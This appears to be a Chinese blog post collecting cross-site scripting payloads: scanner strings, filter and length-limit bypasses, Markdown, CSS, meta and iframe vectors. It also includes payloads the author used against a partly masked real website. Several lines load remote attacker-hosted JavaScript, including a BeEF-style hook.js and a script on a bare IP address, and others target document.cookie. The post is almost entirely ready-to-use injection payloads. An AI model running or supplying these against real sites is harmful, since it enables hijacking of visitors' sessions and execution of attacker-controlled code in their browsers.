XSS payload

2020-08-19  本文已影响0人  违规昵称不予展示

xss在线靶场 http://prompt.ml/0 https://xss-game.appspot.com/

这个是AWVS扫描器的payload

+e%27%22%28%29%26%25%3Cacx%3E%3CScRiPt+%3Ealert%281%29%3C%2FScRiPt%3E

1<%div style=width:expression(ZnRe(9043))> 记得把%删掉
 解码如下:
 e'"()&%<acx><ScRiPt >alert(1)</ScRiPt>
"/>e'"()&%<acx><ScRiPt >alert(1)</ScRiPt>  用单引号触发网站原本的双引号来进行闭合

http://www.xxx.com.cn/cn/(Z('%20onerror=alert%601%60%20'2222'%20))/Default.aspx
http://www.xxxx.com.cn/cn/(Z(' onerror=alert`1` '2222' ))/Default.aspx
http://www.sxxxx.com.cn/cn/(Z(' onerror=alert`1` '))/Default.aspx

这是我遇到的一个网站

<iframe src=https://baidu.com width=1366 height=768></iframe>
<iframe src=https://baidu.com width=1366 height=768
<details ontoggle="$.getScript`https://cdn.ampproject.org/rtv/012008102328000/amp4ads-v0.js`"
<details ontoggle="$.getScript`http://47.100.79.239/Test/JS.js`"
<image src="http://47.100.79.239/Test/JS.js>
<image src="http://300.jumpw.com/defaults/images/logo.png">

常用

大小写绕过

各种alert

<script>alert`1`</script>

伪协议

Chrome XSS auditor bypass

长度限制

<script>s+="l"</script>
\...
<script>eval(s)</script></pre>

jquery sourceMappingURL

</textarea><script>var a=1//@ sourceMappingURL=//xss.site</script>

图片名

"><img src=x onerror=alert(document.cookie)>.gif

过期的payload

css

<div style="background-image:url(javascript:alert(/xss/))">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE></pre>

markdown

[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
![a'"`onerror=prompt(document.cookie)](x)
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)</pre>

iframe

<iframe onload='
    var sc   = document.createElement("scr" + "ipt");
    sc.type  = "text/javascr" + "ipt";
    sc.src   = "http://1.2.3.4/js/hook.js";
    document.body.appendChild(sc);
    '
/>

form

meta

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

其他一些奇怪的标签

河南<video data-automation="FootageHero_heroVideo_video" loop="" autoplay="" class="u_c_8bdc3"><source src="https://ak.picdn.net/footage/assets/directors_choice/footage-carousel-stock-videos.webm" type="video/webm"><source src="https://ak.picdn.net/footage/assets/directors_choice/footage-carousel-stock-videos.mp4" type="video/mp4"></video>


image.png

https://www.cnblogs.com/hookjoy/p/6181350.html

上一篇 下一篇

猜你喜欢

热点阅读